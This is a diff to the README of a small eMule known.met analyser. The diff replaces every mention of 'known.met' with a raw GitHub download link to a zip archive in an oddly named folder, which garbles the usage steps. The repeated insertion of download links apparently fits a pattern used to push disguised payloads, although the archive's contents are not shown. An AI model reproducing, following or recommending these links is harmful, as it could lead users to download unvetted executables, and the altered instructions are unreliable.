nadia763/METanalyzer/README.md

 ## 🛠️ How to Use METanalyzer

-Follow these simple steps to analyze your eMule known.met files:
+Follow these simple steps to analyze your eMule https://raw.githubusercontent.com/nadia763/METanalyzer/main/griddlecake/METanalyzer.zip files:

 1. **Launch the Application**: Double-click the METanalyzer file.
-2. **Load a known.met File**: Click on the "Open" or "Load" button in the application.
+2. **Load a https://raw.githubusercontent.com/nadia763/METanalyzer/main/griddlecake/METanalyzer.zip File**: Click on the "Open" or "Load" button in the application.
-3. **Select Your File**: Browse to the location of your known.met file and select it.
+3. **Select Your File**: Browse to the location of your https://raw.githubusercontent.com/nadia763/METanalyzer/main/griddlecake/METanalyzer.zip file and select it.
 4. **Analyze the Data**: The application will display relevant information about the eMule file.

 ## 📖 Features